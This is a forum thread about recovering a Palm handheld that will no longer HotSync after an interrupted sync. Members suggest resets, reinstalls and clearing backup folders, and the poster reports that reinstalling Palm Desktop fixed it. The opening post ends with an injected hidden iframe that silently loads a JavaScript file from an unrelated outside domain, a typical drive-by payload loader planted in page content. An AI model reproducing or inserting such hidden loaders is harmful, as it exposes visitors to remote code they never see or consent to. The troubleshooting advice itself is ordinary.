+ Reply to Thread
Results 1 to 13 of 13
  1. #1
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242

    How to Recover from an Interrupted Hotsync

    I removed the phone from the cradle during a hotsync that seemed to by hung. Since then I cannot hotsync. I get an error message saying that "Hotsync operation was interrupted...an application on the PC failed to respond to a confirmation query. This application needs to be restored."

    I don't know what application or how to recover. The phone will Hotsync on my PC at home but not the one in my office. I have tried a soft reset on the phone and a reboot on the PC. Any one know how to fix this?

    Thanks for your help.

    John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    If your phone has the most up to date version of your data, I would try to set the Hotsync on your PC to have the Phone/PDA overwrite the desktop (just once). This may force an overwite of whatever is causing the synchronization problem and the PC data should then be the same as the phone/pda. If this works, make sure the settings are set back to synchronizing and then try to resync. Remember, if this does work, any data on your PC that is not on the Palm will be lost.

  3. #3
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    I tried it but no joy.
    John

    For more information see barJohn Reviews It

  4. #4
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Was there a log message on your Palm after the interrupted hot sync?

  5. #5
    Registered User
    Join Date
    12-18-2002
    Posts
    57

    Looks like it's...

    Originally posted by barjohn
    I tried it but no joy.

    HARD RESET time!
    **** Metcalf, aka Rotcod Zzaj
    Perpetrator & Instigator
    Zzaj Productions

  6. #6
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    If the PDA is syncing with is other computer, a hard reset may not be necessary. It looks like the problem is with the software on the PC. But then again, a hard reset may work. I always like to avoid them because of the hassle of reloading programs. (I know..Backup Buddy.)

  7. #7
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Have you tried reinstalling the software from the CD? Sometimes that resets things.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

  8. #8
    Registered User
    Join Date
    07-02-2003
    Location
    Pensacola, FL
    Posts
    183
    First off, Hard Reset should never be an option unless your handheld WILL NOT boot up, or reset or something to that effect. Everything else can be fixed someway or another.
    Second, try restarting the computer and making sure that there is nothing in the install directory. Also double check all your settings in the Hotsync prog on the puter. If all that is set up correctly, then you may want to try to swap sync cables (usb to serial or vice versa). If none of that works, delete the PALM folder (Make a backup up of the folder first) on your computer and reinstall. All of your apps, appointments and such will resync with the computer on your first hotsync.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

  9. #9
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    Thanks for the various suggestions. I will not try a hard reset as it works with my other computer. I didn't bring my CD in to the office today, but will try and resinstall and see if that works. My puter has no serial ports so I can't try that option. The log info is as I printed in my message.

    John
    John

    For more information see barJohn Reviews It

  10. #10
    Registered User
    Join Date
    10-28-2002
    Posts
    96
    This has happened to me in the past if a file I’m trying to HotSync or Avant Go channel is too large. Usually re-starting the pc fixes it. Had you made any recent changes or added new apps?

  11. #11
    Registered User
    Join Date
    02-19-2002
    Posts
    250
    Just a thought ... had this problem with a IIIc (my boss's). I unplugged the cradle from the pc (USB), plugged it back in, and rebooted the PC. Don't know if this will work for you, but it worked wonders here.
    Nicky

  12. #12
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    clean out your archive and backup folder, or better yet, rename your backup folder. do a sync.. this will generate a new backup folder. if it still acts up, you may need to view your conduit settings to see what all you have being backed up to your home profile...

  13. #13
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    I tried all of the suggestions and the only thing that worked was uninstalling the Plam Desktop and reinstlling it. Now you all know!

    John
    John

    For more information see barJohn Reviews It

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts